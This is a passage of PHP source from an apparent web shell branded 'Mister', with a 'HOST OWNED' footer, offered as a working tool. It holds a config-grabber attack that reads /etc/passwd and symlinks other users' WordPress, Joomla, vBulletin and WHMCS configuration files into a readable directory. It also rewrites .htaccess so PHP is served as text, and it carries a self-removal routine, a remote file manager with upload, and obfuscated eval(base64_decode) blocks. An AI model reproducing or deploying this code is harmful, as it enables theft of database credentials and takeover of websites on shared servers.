  3843. echo ''. $FOTTER2 .'' ;
  3844. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3845. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3846. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3847. $SERVERIP1 = "SERVER IP :";
  3848. echo ''. $SERVERIP1 .'' ;
  3849. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3850. $SPAN3 = "</span>";
  3851. echo ''. $SPAN2 .'' ;
  3852. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3853. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3854. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3855. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3856. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3857. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3858. $HOSTOWNED1 = "HOST OWNED :";
  3859. echo ''. $HOSTOWNED1 .'' ;
  3860. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3861. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3862. echo ''. $REPORTERROR .'</a></span></footer>';
  3863. echo ''. $THEEND .'' ;
  3864. exit;}
  3865. if ($_GET['Mister'] == 'HashId') {
  3866. echo '<br><center><nav class="social"><ul>
  3867. <li><a href="?Mister=string">Encoder</a></li>
  3868. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  3869. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  3870. <li><a href="?Mister=HashId">Hash Identification</a></li>
  3871. </ul></nav></center>
  3872. ';
  3873. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0;'>HASH IDENTIFICATION</span></nav><center>";   
  3874. if(isset($_POST['gethash'])){
  3875.         $hash = $_POST['hash'];
  3876.         if(strlen($hash)==32){
  3877.             $hashresult = "MD5 Hash";
  3878.         }elseif(strlen($hash)==40){
  3879.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3880.         }elseif(strlen($hash)==13){
  3881.             $hashresult = "DES(Unix) Hash";
  3882.         }elseif(strlen($hash)==16){
  3883.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3884.         }elseif(strlen($hash)==41){
  3885.             $GetHashChar = substr($hash, 40);
  3886.             if($GetHashChar == "*"){
  3887.                 $hashresult = "MySQL5 Hash";
  3888.             }  
  3889.         }elseif(strlen($hash)==64){
  3890.             $hashresult = "SHA-256 Hash";
  3891.         }elseif(strlen($hash)==96){
  3892.             $hashresult = "SHA-384 Hash";
  3893.         }elseif(strlen($hash)==128){
  3894.             $hashresult = "SHA-512 Hash";
  3895.         }elseif(strlen($hash)==34){
  3896.             if(strstr($hash, '$1$')){
  3897.                 $hashresult = "MD5(Unix) Hash";
  3898.             }  
  3899.         }elseif(strlen($hash)==37){
  3900.             if(strstr($hash, '$apr1$')){
  3901.                 $hashresult = "MD5(APR) Hash";
  3902.             }  
  3903.         }elseif(strlen($hash)==34){
  3904.             if(strstr($hash, '$H$')){
  3905.                 $hashresult = "MD5(phpBB3) Hash";
  3906.             }  
  3907.         }elseif(strlen($hash)==34){
  3908.             if(strstr($hash, '$P$')){
  3909.                 $hashresult = "MD5(Wordpress) Hash";
  3910.             }  
  3911.         }elseif(strlen($hash)==39){
  3912.             if(strstr($hash, '$5$')){
  3913.                 $hashresult = "SHA-256(Unix) Hash";
  3914.             }  
  3915.         }elseif(strlen($hash)==39){
  3916.             if(strstr($hash, '$6$')){
  3917.                 $hashresult = "SHA-512(Unix) Hash";
  3918.             }  
  3919.         }elseif(strlen($hash)==24){
  3920.             if(strstr($hash, '==')){
  3921.                 $hashresult = "MD5(Base-64) Hash";
  3922.             }  
  3923.         }else{
  3924.             $hashresult = "HASH TYPE NOT FOUND";
  3925.         }
  3926.     }else{
  3927.         $hashresult = "<span style='color:red;'> NOT HASH ENTERED </span>";
  3928.     }
  3929.     ?>
  3930.     <center>
  3931. <form action="" method="POST"><br><div class='content'>
  3932. <span style='color:#FFFFFF;'> ENTER UR HASH </span> : <br><td><input type="text" name="hash" size='60' style="width:40%;"/></td>
  3933. <br><br><input type="submit" class="Mister-button" name="gethash" value="Identify Hash" ><br><br>
  3934. <span style='color:#FFFFFF;'> RESULT</span> : <span style='color:#0000F0;'><?php echo $hashresult; ?></span><br><br>
  3935.     </table></form>
  3936.     </center>
  3937.     <?php
  3938. $FOTTER2 = "<footer class='MK-footer'>";  
  3939. echo ''. $FOTTER2 .'' ;
  3940. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3941. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3942. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3943. $SERVERIP1 = "SERVER IP :";
  3944. echo ''. $SERVERIP1 .'' ;
  3945. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3946. $SPAN3 = "</span>";
  3947. echo ''. $SPAN2 .'' ;
  3948. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3949. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3950. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3951. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3952. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3953. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3954. $HOSTOWNED1 = "HOST OWNED :";
  3955. echo ''. $HOSTOWNED1 .'' ;
  3956. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3957. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3958. echo ''. $REPORTERROR .'</a></span></footer>';
  3959. echo ''. $THEEND .'' ;
  3960. exit;}
  3961.  
  3962. //////////// IP LOOKUP
  3963. if ($_GET["Mister"] == "iplookdom"){
  3964. echo "<br><center><nav class='social'><ul>
  3965. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3966. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3967. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3968. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3969. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3970. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3971. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3972. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3973. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3974. <li><a href='?Mister=whois'>Website Whois</a></li>
  3975. </ul></nav></center>";
  3976. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>IP LOOKUP REVERSE</span></nav><br><div class=content>
  3977. <center>";
  3978. ?>
  3979. <center><br><form><input type='text' size='60' value='<?php echo "".$_SERVER['HTTP_HOST']."";?>' name='Mister' style='width:40%' class='input'/><input type='hidden' name='Mister' value='iplookdom'><br><br><input type='submit' value='CHECK IT' class='Mister-button'></form></center>
  3980. <?php
  3981. if(isset($_GET["Mister"]))
  3982. {
  3983. $site = $_GET["Mister"];
  3984. $Mister = "http://domains.yougetsignal.com/domains.php";
  3985.  
  3986. //Curl Function
  3987. $ch = curl_init($Mister);
  3988. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3989. curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$site&ket=");
  3990. curl_setopt($ch, CURLOPT_HEADER, 0);
  3991. curl_setopt($ch, CURLOPT_POST, 1);
  3992. $resp = curl_exec($ch);
  3993. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3994. $array = explode(",,", $resp);
  3995. unset($array[0]);
  3996. echo "<table style='margin: 0 auto'>";
  3997. foreach($array as $lnk)
  3998. {
  3999.     print "<tr><td><a  style=\"color:#0000F0;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
  4000. }
  4001. echo "</table>";
  4002. curl_close($ch);
  4003. }
  4004. $FOTTER2 = "<footer class='MK-footer'>";  
  4005. echo ''. $FOTTER2 .'' ;
  4006. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4007. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4008. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4009. $SERVERIP1 = "SERVER IP :";
  4010. echo ''. $SERVERIP1 .'' ;
  4011. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4012. $SPAN3 = "</span>";
  4013. echo ''. $SPAN2 .'' ;
  4014. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4015. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4016. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4017. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4018. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4019. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4020. $HOSTOWNED1 = "HOST OWNED :";
  4021. echo ''. $HOSTOWNED1 .'' ;
  4022. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4023. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4024. echo ''. $REPORTERROR .'</a></span></footer>';
  4025. echo ''. $THEEND .'' ;
  4026. exit ;
  4027. }
  4028. ////////
  4029.  if ($_GET['Mister'] == 'Grabber') {
  4030. echo "<br><center><nav class='social'><ul>
  4031. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  4032. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  4033. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  4034. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  4035. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  4036. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  4037. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  4038. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  4039. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  4040. <li><a href='?Mister=whois'>Website Whois</a></li>
  4041. </ul></nav></center>";
  4042. echo "<nav class='Mister-nav'>
  4043. <center><span style='font-size:18px;  color:#0000F0'>ATTACK CONFIG GRABBER
  4044. </span></nav><br><div class=content><center>";
  4045. ?><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="white" size="2pt">/ETC/PASSWD GET</p><form method="POST" style="width:40%"><textarea name="passwd" rows='15' cols='60' class='input' style="height:200px;"><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" size="100" value="DONE !" type="submit" class="Mister-button"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error> SYMLINK IS DISABLED :( </error>');}@mkDIR('MKConfig', 0755);@chDIR('MKConfig');
  4046. $htaccess="
  4047. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  4048. Options Indexes FollowSymLinks
  4049. ForceType text/plain
  4050. AddType text/plain .php
  4051. AddType text/plain .html
  4052. AddType text/html .shtml
  4053. AddType txt .php
  4054. AddHandler server-parsed .php
  4055. AddHandler txt .php
  4056. AddHandler txt .html
  4057. AddHandler txt .shtml
  4058. Options All
  4059. Options All";
  4060. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "<br><br><center><span style='font-size:10px;  color:#0000F0'>WAIT ...</span></center><br>";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo '<span style="font-size:10px;  color:#0000F0"> DONE ! </span><a target="_blank" href="MKConfig">OPEN CONFIGS</a></span>';}
  4061. $FOTTER2 = "<footer class='MK-footer'>";  
  4062. echo ''. $FOTTER2 .'' ;
  4063. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4064. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4065. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4066. $SERVERIP1 = "SERVER IP :";
  4067. echo ''. $SERVERIP1 .'' ;
  4068. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4069. $SPAN3 = "</span>";
  4070. echo ''. $SPAN2 .'' ;
  4071. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4072. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4073. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4074. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4075. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4076. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4077. $HOSTOWNED1 = "HOST OWNED :";
  4078. echo ''. $HOSTOWNED1 .'' ;
  4079. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4080. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4081. echo ''. $REPORTERROR .'</a></span></footer>';
  4082. echo ''. $THEEND .'' ;
  4083. exit ; }
  4084. ///// REMOVE SHELL
  4085. if ($_GET['Mister'] == 'kil') {
  4086. $FILE = $_SERVER['PHP_SELF'];
  4087. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  4088. header(' REFRESH: 0; '.$_SERVER['PHP_SELF'].''); } }
  4089. function DIRMISTER_K ($DIR) {}
  4090. HIDMISTER_K (); { MISTERMISTER_K ();}
  4091. ////// FILES
  4092. if ($_GET['Mister'] == 'FILES'){
  4093. function getlist ($DIRECTORY) {
  4094. global $delim, $WIN;
  4095. if ($d = @OPENDIR($DIRECTORY)) {
  4096. while (($FILENAME = @READDIR($d)) !== false) {
  4097. $path = $DIRECTORY . $FILENAME;
  4098. if ($stat = @lstat($path)) {
  4099.                 $FILE = array(
  4100.                     'FILENAME'    => $FILENAME,
  4101.                     'path'        => $path,
  4102.                     'IS_FILE'     => @IS_FILE($path),
  4103.                     'IS_DIR'      => @IS_DIR($path),
  4104.                     'IS_LINK'     => @IS_LINK($path),
  4105.                     'IS_READABLE' => @IS_READABLE($path),
  4106.                     'IS_WRITABLE' => @IS_WRITABLE($path),
  4107.                     'size'        => $stat['size'],
  4108.                     'MTIME'       => @fileMTIME($path),
  4109.                     'ATIME'       => @FILEATIME($path),
  4110.                     'CTIME'       => @FILECTIME($path));
  4111. if ($FILE['IS_DIR']) {
  4112. $FILE['IS_EXECUTABLE'] = @FILE_EXISTS($path . $delim . '.');
  4113. } else {
  4114. if (!$WIN) {
  4115. $FILE['IS_EXECUTABLE'] = @IS_EXECUTABLE($path);
  4116. } else {
  4117. $FILE['IS_EXECUTABLE'] = true;}}
  4118. if ($FILE['IS_LINK']) $FILE['target'] = @readlink($path);
  4119. if (function_exists('posix_getpwuid')) $FILE['owner_name'] = @RESET(posix_getpwuid($FILE['owner']));
  4120. if (function_exists('posix_getgrgid')) $FILE['group_name'] = @RESET(posix_getgrgid($FILE['group']));
  4121. $FILES[] = $FILE;}}
  4122. return $FILES;} else {
  4123. return false;}}
  4124. function sortlist (&$list, $key, $REVERSE) {
  4125. quicksort($list, 0, sizeof($list) - 1, $key);
  4126. if ($REVERSE) $list = array_reverse($list);}
  4127. function quicksort (&$array, $first, $last, $key) {
  4128. if ($first < $last) {
  4129.         $cmp = $array[floor(($first + $last) / 2)][$key];
  4130.         $l = $first;
  4131.         $r = $last;
  4132. while ($l <= $r) {
  4133. while ($array[$l][$key] < $cmp) $l++;
  4134. while ($array[$r][$key] > $cmp) $r--;
  4135. if ($l <= $r) {
  4136.                 $tmp = $array[$l];
  4137.                 $array[$l] = $array[$r];
  4138.                 $array[$r] = $tmp;
  4139.                 $l++;
  4140.                 $r--;}}
  4141.         quicksort($array, $first, $r, $key);
  4142.         quicksort($array, $l, $last, $key);}}
  4143. //////// EXTENSION
  4144. //// NUL : function is_script ($FILENAME) {
  4145. //// NUL : return ereg('\.php$|\.html$|\.py$|\.pl$|\.js$|\.css$|\.ini$|\.php.xjpg$|\.php.leet$|\.xml$', $FILENAME);}
  4146. //////// EXTENSION 2
  4147. function getmimetype ($FILENAME) {
  4148. static $mimes = array(
  4149.         '\.jpg$|\.jpeg$'  => 'image/jpeg',
  4150.         '\.gif$'          => 'image/gif',
  4151.         '\.png$'          => 'image/png',
  4152.         '\.php$'          => 'text/php',
  4153.         '\.php.xjpg$'     => 'image/php.xjpg',
  4154.         '\.php.xjpg$'     => 'application/php.xjpg',
  4155.         '\.php.xjpg$'     => 'text/php.xjpg',
  4156.         '\.html$'         => 'text/html',
  4157.         '\.txt$|\.asc$'   => 'text/plain',
  4158.         '\.xml$|\.xsl$'   => 'application/xml',
  4159.         '\.pdf$'          => 'application/pdf',
  4160.         '\.pphp$'         => 'application/pphp',
  4161.         '\.php$'          => 'application/php',
  4162.         '\.icon$'         => 'application/icon',
  4163.         '\.leet$'         => 'application/leet',
  4164.         '\.py$'           => 'application/py',
  4165.         '\.pl$'           => 'application/pl',
  4166.         '\.exe$'          => 'application/exe',);
  4167. ///// FUNCTIONS FILE MANAGER
  4168. foreach ($mimes as $regex => $mime) {
  4169. if (eregi($regex, $FILENAME)) return $mime;}
  4170. return 'text/plain';}
  4171. function del ($FILE) {
  4172. global $delim;
  4173. if (!@IS_LINK($FILE) && !FILE_EXISTS($FILE)) return false;
  4174. if (!@IS_LINK($FILE) && @IS_DIR($FILE)) {
  4175. if ($DIR = @OPENDIR($FILE)) {
  4176. $error = false;
  4177. while (($f = READDIR($DIR)) !== false) {
  4178. if ($f != '.' && $f != '..' && !del($FILE . $delim . $f)) {
  4179.                     $error = true;}}
  4180. closeDIR($DIR);
  4181. if (!$error) return @rmDIR($FILE);
  4182. return !$error;
  4183.     } else { return false;}
  4184.     } else { return @unlink($FILE);}}
  4185. function addslash ($DIRECTORY) {
  4186. global $delim;
  4187. if (substr($DIRECTORY, -1, 1) != $delim) {
  4188.         return $DIRECTORY . $delim;
  4189. } else {  return $DIRECTORY;}}
  4190. function RELATIVE2ABSOLUTE ($string, $DIRECTORY) {
  4191. if (path_is_relative($string)) {
  4192. return simplify_path(addslash($DIRECTORY) . $string);
  4193.     } else { return simplify_path($string);}}
  4194. function path_is_relative ($path) {
  4195.     global $WIN;
  4196. if ($WIN) { return (substr($path, 1, 1) != ':'); } else {
  4197.         return (substr($path, 0, 1) != '/');}}
  4198. function absolute2relative ($DIRECTORY, $target) {
  4199.     global $delim;
  4200.     $path = '';
  4201.     while ($DIRECTORY != $target) {
  4202. if ($DIRECTORY == substr($target, 0, strlen($DIRECTORY))) {
  4203.             $path .= substr($target, strlen($DIRECTORY));
  4204.             break;
  4205.         } else {
  4206. $path .= '..' . $delim;
  4207. $DIRECTORY = substr($DIRECTORY, 0, strrpos(substr($DIRECTORY, 0, -1), $delim) + 1);}}
  4208. if ($path == '') $path = '.';
  4209. return $path;}
  4210. function simplify_path ($path) {
  4211. global $delim;
  4212. if (@FILE_EXISTS($path) && function_exists('realpath') && @realpath($path) != '') {
  4213.         $path = realpath($path);
  4214. if (@IS_DIR($path)) {
  4215.             return addslash($path);
  4216.         } else {
  4217.         return $path;}}
  4218.     $pattern  = $delim . '.' . $delim;
  4219. if (@IS_DIR($path)) {
  4220.         $path = addslash($path);}
  4221. while (strpos($path, $pattern) !== false) {
  4222.         $path = str_replace($pattern, $delim, $path);}
  4223.     $e = addslashes($delim);
  4224.     $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
  4225. while (ereg($regex, $path)) {
  4226.         $path = ereg_replace($regex, $delim, $path);}
  4227. return $path;}
  4228. function human_FILESIZE ($FILESIZE) {
  4229.     $suffices = 'kMGTPE'; $n = 0;
  4230. while ($FILESIZE >= 1000) {
  4231.         $FILESIZE /= 1024;
  4232.         $n++;}
  4233. $FILESIZE = round($FILESIZE, 3 - strpos($FILESIZE, '.'));
  4234. if (strpos($FILESIZE, '.') !== false) {
  4235. while (in_array(substr($FILESIZE, -1, 1), array('0', '.'))) {
  4236.             $FILESIZE = substr($FILESIZE, 0, strlen($FILESIZE) - 1); } }
  4237. $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
  4238. return $FILESIZE . " {$suffix}B";}
  4239. function strip (&$str) {
  4240. $str = stripslashes($str);}
  4241. //////// LISTING PAGE
  4242. function LISTING_PAGE ($MESSAGE = null) {
  4243. global $self, $DIRECTORY, $SORT, $REVERSE;
  4244.     HTML_HEADER();
  4245.     $list = getlist($DIRECTORY);
  4246. if (array_key_exists('sort', $_GET)) $SORT = $_GET['sort']; else $SORT = 'FILENAME';
  4247. if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true')
  4248. $REVERSE = true; else $REVERSE = false; sortlist($list, $SORT, $REVERSE);
  4249. echo "<div class='content'>";
  4250. echo '<table  cellpadding=0 cellspacing=1 style="width:100%;">';
  4251. echo '<form enctype="multipart/form-data" action="' . $self . '?Mister=FILES" method="post">';
  4252.     DIRECTORY_CHOICE();
  4253. if (!empty($MESSAGE)) {
  4254.         spacer();
  4255. echo $MESSAGE;}
  4256. if (@IS_WRITABLE($DIRECTORY)) {
  4257.         CREATE_BOX();
  4258.         UPLOAD_BOX();
  4259. } else { spacer();}
  4260. if ($list) { listing($list);
  4261. } else {
  4262. echo error('NOT_READABLE', $DIRECTORY);}
  4263. echo '</table></form></div>';
  4264.     HTML_FOOTER();}
  4265. function DIRECTORY_CHOICE () {
  4266. global $DIRECTORY, $HOMEDIR, $COLS, $self;
  4267. ///////////// DIRECTORY
  4268. echo '<tr>'; echo '<td style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '" id="DIRECTORY">'; echo '<b> &check; <a href="' . $self . '?Mister=FILES&DIR=' . urlencode($HOMEDIR) . '">' . word('DIRECTORY') . '</a> : </b>'; echo '<input type="text" name="DIR" size="' . textfieldsize($DIRECTORY) . '" value="' . html($DIRECTORY) . '" ONFOCUS="activate(\'DIRECTORY\')" style="width:50%">'; echo '<input type="submit" class="Mister-button" name="CHANGEDIR" value="' . word('CHANGE') . '" ONFOCUS="activate(\'DIRECTORY\')"></td>';} echo '</tr>';
  4269. ///////////// CREAT
  4270. function CREATE_BOX () {
  4271. global $COLS;
  4272. echo '<tr>'; echo '<td colspan="' . $COLS . '" id="CREATE" style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" >'; echo '<b>&check; MAKE NEW : </b>'; echo '<select name="CREATE_type"  ONFOCUS="activate(\'CREATE\')">'; echo '<option value="FILE">' . word('FILE') . '</option>'; echo '<option value="DIRECTORY">' . word('DIRECTORY') . '</option>'; echo '</select>'; echo '<input type="text" name="CREATE_NAME" ONFOCUS="activate(\'CREATE\')" / style="width:40%">'; echo '<input type="submit" class="Mister-button" name="SUBMIT_CREATE" value="' . word('CREATE') . '" ONFOCUS="activate(\'CREATE\')" />'; echo '</td>';}
  4273. ///////////// UPLOAD
  4274. function UPLOAD_BOX () {
  4275. global $COLS;
  4276. echo '<tr>'; echo '<td style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '" id="UPLOAD" >'; echo '<b> &check; UPLOAD ' . word('FILE') . ' : </b>';
  4277. echo '<input type="FILE" name="UPLOAD" ONFOCUS="activate(\'other\')" style="width:40%;">'; echo '<input type="submit" class="Mister-button" name="SUBMIT_UPLOAD" value="' . word('UPLOAD') . '" ONFOCUS="activate(\'other\')">'; echo '</td></tr>';}
  4278. //////////
  4279. function listing ($list) {
